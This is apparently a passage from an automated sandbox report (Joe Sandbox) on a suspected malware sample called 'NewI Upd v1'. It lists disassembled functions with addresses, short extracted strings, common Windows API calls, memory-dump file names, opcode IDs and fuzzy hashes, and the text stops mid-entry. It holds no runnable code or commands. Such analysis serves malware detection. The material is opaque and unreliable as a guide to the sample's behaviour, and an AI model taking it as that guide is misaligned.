Instruction Fuzzy Hash: F5221376A083528BC3148F29C8912ABB7F2FFC5314F19956EE8C997351EB388942C745

Function 00422710 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

wvut, xrefs: 00422B51

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: wvut
API String ID: 0-2196794189
Opcode ID: 9c9d8a6b287a7178b3d2d396fe97bc9716ec4effa8d724a6278157c9a8b29e2e
Instruction ID: 9fc4db61dbacd35461e95bd8a68a7c56547a6397adc25f4a6770617cd9e7a88a
Opcode Fuzzy Hash: 9c9d8a6b287a7178b3d2d396fe97bc9716ec4effa8d724a6278157c9a8b29e2e
Instruction Fuzzy Hash: 1BB17AB17043206BDB14AF24999277BB3E1EF81314F59892EE8C597381E7BCD905839A

Function 00439B83 Relevance: 1.7, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

., xrefs: 00439C6E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: b44aaa4b881b229a7fb320e730a7cbc669038d8b7bdfd7c1b8fe6b8aab6ac102
Instruction ID: ce53fe65cca3c19cc09fcc557d5b770b3a12b5b40f923682317799c05f835429
Opcode Fuzzy Hash: b44aaa4b881b229a7fb320e730a7cbc669038d8b7bdfd7c1b8fe6b8aab6ac102
Instruction Fuzzy Hash: F8D1F33A214615CBCB189F38EC5126B73F1FF4A751F4A88BDD4818B2A0EBB9C964C715

Function 0042B190 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

", xrefs: 0042B478

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 57d48448680f6229ba304471105e4fd2e8bbbe3056bff01ca0045dcf8bc26b0a
Instruction ID: c763060bf1145a606778638d8daebe5b324e4591cdb452345f9319ca4427d103
Opcode Fuzzy Hash: 57d48448680f6229ba304471105e4fd2e8bbbe3056bff01ca0045dcf8bc26b0a
Instruction Fuzzy Hash: CAD1F372B083259FC714CE14A49076BB7EAEF84314F58892EE8998B382D738DD4587D6

Function 00422330 Relevance: 1.6, Strings: 1, Instructions: 348COMMON

Download Yara Rule

Strings

jjQ?, xrefs: 004224C5

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: jjQ?
API String ID: 0-626640805
Opcode ID: 8d909663dab21130efde3760dc3b767eb412b354a4a6913206843a32d4700e0a
Instruction ID: b03a6a7432eeb08f4f6dbddbb241025ce9f96bfc6c407e1e5b3ac363557740b9
Opcode Fuzzy Hash: 8d909663dab21130efde3760dc3b767eb412b354a4a6913206843a32d4700e0a
Instruction Fuzzy Hash: 08B147B2604310ABD724DF20DD92B67B3A1FFC5314F14892DE98597381E7B8E905C79A

Function 00886940 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,4903A6BA), ref: 00886996

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 78e1b695c1c5eefbbc5e4d3acb78ae026f12cf05ea3cdf2d0dbe4a65494ca8a3
Instruction ID: 354129c4806bdf6609e9900282e0fbcd1c4648b8113f9a62a12083d5a2dd40ba
Opcode Fuzzy Hash: 78e1b695c1c5eefbbc5e4d3acb78ae026f12cf05ea3cdf2d0dbe4a65494ca8a3
Instruction Fuzzy Hash: D231AC75D0426CDFCB04DFA8C880AEEBBB1FB49310F20826AD419B7741E7396941CBA4

Function 0043F600 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

wvut, xrefs: 0043F602

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: wvut
API String ID: 2994545307-2196794189
Opcode ID: 342f00f407c141f6e7a288519e8bc9032623d786883e271897790d5da8d631ae
Instruction ID: fde0ab6a6a59c5feb220254cdff88481c1e42ddcaa36880b32455d244f373506
Opcode Fuzzy Hash: 342f00f407c141f6e7a288519e8bc9032623d786883e271897790d5da8d631ae
Instruction Fuzzy Hash: 3A91DF75A042019FC719DF28C891A2BB3E2AFDD720F15957EE8898B365DB34DC06CB46

Function 0043F960 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

fo`a, xrefs: 0043F962

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: fo`a
API String ID: 2994545307-600490423
Opcode ID: dc6b3311c9b6c7c7a9829328e82e53ced41db2e21b129a76fbec0d6fe261c598
Instruction ID: cda554d51f78bfb7330dc5b45b63d80ab2477f6ca349c01ff6a3bf47399cd916
Opcode Fuzzy Hash: dc6b3311c9b6c7c7a9829328e82e53ced41db2e21b129a76fbec0d6fe261c598
Instruction Fuzzy Hash: D9A1F076A083259BCB249E28C89066BB3E2FFCC310F19953DE98587355D778AC05D785

Function 0042BFA4 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

ffoh, xrefs: 0042C15D

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ffoh
API String ID: 0-3529465427
Opcode ID: 13e24c1ed09359ebf6273ba0177daf4f219596c24aa65b5e5558d3a58e05237f
Instruction ID: 794e73f487c3847271e7422f81669b9b1b00bbcaf88f8760afd34f6f75263fa8
Opcode Fuzzy Hash: 13e24c1ed09359ebf6273ba0177daf4f219596c24aa65b5e5558d3a58e05237f
Instruction Fuzzy Hash: D5716EA450D3E29BD7324736A4A17B7BFD09FA3345F28098DE4D60B382E775090AC796

Function 0041D9E0 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

~, xrefs: 0041DAAD

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 5361fbc9caad842370639a8333fac6ad2438af9cff0eb2d1440dcaa6c36820f6
Instruction ID: 1c436f71a3a8cde90baa731bcdf8f75363321e76a6468630c5e6506317c9730c
Opcode Fuzzy Hash: 5361fbc9caad842370639a8333fac6ad2438af9cff0eb2d1440dcaa6c36820f6
Instruction Fuzzy Hash: 05A10972A082215FCB11CE28C84129BBBD1AF95324F19863EE8A9C73D2D778D946D7C5

Function 0041E130 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

U, xrefs: 0041E340

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: cb041b8c4387250bd8b05eb5f53de375d17192a074c7be7876a50ddc16f46950
Instruction ID: a22d85fcfd3ebb894e767beea9bab91247ecbb9a3524fe20347f92de4ce0d1b5
Opcode Fuzzy Hash: cb041b8c4387250bd8b05eb5f53de375d17192a074c7be7876a50ddc16f46950
Instruction Fuzzy Hash: 26910737B59A804BD328893D4C123EB7A834BD6330F2DC77EA9B58B3E5D96988454345

Function 00431200 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

U, xrefs: 004313A0

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0d135ab1f1259071adc8bf91d02c0235560879e4f52d5f420c2b9ae5a574f7c3
Instruction ID: 0d75165518db6c030528d5889de9a2c7a73d9c214497812ccdec65adedd39f39
Opcode Fuzzy Hash: 0d135ab1f1259071adc8bf91d02c0235560879e4f52d5f420c2b9ae5a574f7c3
Instruction Fuzzy Hash: BB811727749AD00BD3288D3C4C612AA7A934BDA330F2DD77EA5F18B3E5D9AD48064345

Function 00429441 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

wvut, xrefs: 0042966E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: wvut
API String ID: 0-2196794189
Opcode ID: 7cd1ee3031f3755bcf0cc77e98212dd383b61ac154102b85976292f9be4fcc0e
Instruction ID: 88146b9a55b37298dc01e35668b496685686cbb3fccf2a47d5b57e9cab182034
Opcode Fuzzy Hash: 7cd1ee3031f3755bcf0cc77e98212dd383b61ac154102b85976292f9be4fcc0e
Instruction Fuzzy Hash: 53714779A01211CFDB20CFA8DC416ABB7B1FF8A314F19416DD584AB3A1D7789C01CB49

Function 0087DB70 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0087DB80,?,0087CD08), ref: 0087DB78

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2b55d5a20041e16482c50df389fb16f833b5038dc779683c1f98a9bd8c723162
Instruction ID: 61a86a003eb6e26e47837b417855be9b39fd7a3ccf6b37e0f4692d57db810ee7
Opcode Fuzzy Hash: 2b55d5a20041e16482c50df389fb16f833b5038dc779683c1f98a9bd8c723162
Instruction Fuzzy Hash: AAA0223028030CE3820023C2BC0A882BBECF802BB23008020F20C80A030B82A00000EA

Function 004167AE Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

wvut, xrefs: 004167D5

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: wvut
API String ID: 2994545307-2196794189
Opcode ID: 3b5054641af0fceb52603f9085f144d06d16b515ef2d04f4490ca8e6986df80e
Instruction ID: d1e52be8b834acd533db16a4d6f36ebe122bd4857dbc4d46798b5727b717fd8c
Opcode Fuzzy Hash: 3b5054641af0fceb52603f9085f144d06d16b515ef2d04f4490ca8e6986df80e
Instruction Fuzzy Hash: DD516974A05300AFD768AF18888167BB762FBD6318F25562DC48217365C375DC43CB8E

Function 00416DE6 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

wvut, xrefs: 00416E05

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: wvut
API String ID: 2994545307-2196794189
Opcode ID: 0d7d2ef725fdd133e4b8ca060ca01e4e203c1330e749bc525c119ffb9a848578
Instruction ID: 96f523632ba75ff9f18a3fd7ad0526c5b941d282bf75a97f01533bb0d88cdc5f
Opcode Fuzzy Hash: 0d7d2ef725fdd133e4b8ca060ca01e4e203c1330e749bc525c119ffb9a848578
Instruction Fuzzy Hash: 6C21043C608350DBDB588B18D8516BBB766FB8A328F61172DC08A17352D339DC52CB8E

Function 00429653 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

wvut, xrefs: 0042966E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: wvut
API String ID: 0-2196794189
Opcode ID: ae5ed7c607caeb0273eb1311fbc4309cdb8fec530a0e7f9b3bb64d9df687df17
Instruction ID: 24db1143e917cf06f6c2aae1ca3f118d5d8fbe579e7fd368f403742843fcac53
Opcode Fuzzy Hash: ae5ed7c607caeb0273eb1311fbc4309cdb8fec530a0e7f9b3bb64d9df687df17
Instruction Fuzzy Hash: 99019235B016218BC714CF79DC811AFB7A2BB9A314F29566AC494AB351C7349C01CB99

Function 0041BD56 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

3, xrefs: 0041BD5E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 3630a48d37367f1e999c549ab28ad92bdc40b1c0322f34fa74b3bd4b066b4248
Instruction ID: 65d2ab382a644f48b5a8c637138f9db72ded9f4c32e007ac0043fb670bf46de0
Opcode Fuzzy Hash: 3630a48d37367f1e999c549ab28ad92bdc40b1c0322f34fa74b3bd4b066b4248
Instruction Fuzzy Hash: B11102355083418BD7048F34D5A03ABBFE0DB93328F18596DE0D09B282C37CC84A8B4A

Function 0089B300 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0089B305

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d1e515a44e00c3c20d8ef2104c02c7445689d77d349628b0ed62e5e93adc9d27
Instruction ID: 0fbe990d947f366720009baac66405ac09a61f77c88593088097ead9b49e804c
Opcode Fuzzy Hash: d1e515a44e00c3c20d8ef2104c02c7445689d77d349628b0ed62e5e93adc9d27
Instruction Fuzzy Hash: 25C012380002089BEE00AF62B88CA2137ACB79A314F055020D92A83A1286B92442AFA0

Function 00402F90 Relevance: .7, Instructions: 695COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16cae6da842a7f860867ec46b6203858166b9c9104db8912ce421f67ed3f101
Instruction ID: 76488bc49c1d089a31495088d2edfcb706e73e5373796b330427c1e4ba9fcb12
Opcode Fuzzy Hash: b16cae6da842a7f860867ec46b6203858166b9c9104db8912ce421f67ed3f101
Instruction Fuzzy Hash: 2D5216715083458FCB14CF25C0806AABFE1BF89315F188A7EF89967391D778EA45CB85

Function 0041F900 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821fed6337fdae89cb27e65f2462b5ce508aa8f49189fce1b1a7cb5aa78d292e
Instruction ID: 9a32c8ccb95ca41305b01323a954044287eccbc4edd17f0b648822fb86a8d4d7
Opcode Fuzzy Hash: 821fed6337fdae89cb27e65f2462b5ce508aa8f49189fce1b1a7cb5aa78d292e
Instruction Fuzzy Hash: 96626AB0609B818ED325CB3C8855797BFD5AB5A324F188A5EE0FF873D2C77520058B66

Function 00406770 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89baec68835cc4261e1d6ff22e132daa8c717813890f6faa9baae887a7ddf75
Instruction ID: 4d044aed535853d067e825d0c88db62432c877deda05213e4f1ae6c1002de793
Opcode Fuzzy Hash: c89baec68835cc4261e1d6ff22e132daa8c717813890f6faa9baae887a7ddf75
Instruction Fuzzy Hash: 0B52E0B0908B849FE730CF24C4847A7BBE1AB51310F15897EC5E716BC2D27DB9958B1A

Function 00407550 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f2482b225a86100ad1bff08d81462768cbb0db0a4f9a218bceb44a1474bcd2
Instruction ID: ea4e898e1f3142728219e333e2edf31de8eeb918d5208f3ea39caae7e0310089
Opcode Fuzzy Hash: 31f2482b225a86100ad1bff08d81462768cbb0db0a4f9a218bceb44a1474bcd2
Instruction Fuzzy Hash: AD12A372A0C7118BD724DE18D9806ABB3E1FFD5305F19893ED9C6A7281D738B815CB86

Function 004039E0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0523222db8d8cbad690cd90b28673792489debe5da618472fc25207f167bf1ea
Instruction ID: 6c7a16ac38e05ad862a833ca118e4e773023e48d8ecf13dbc4277513c9493030
Opcode Fuzzy Hash: 0523222db8d8cbad690cd90b28673792489debe5da618472fc25207f167bf1ea
Instruction Fuzzy Hash: 4F323370A14B118FC338CF29C690526BBF5BF85701B604A2ED697A7B90D73AF945CB18

Function 004059F0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
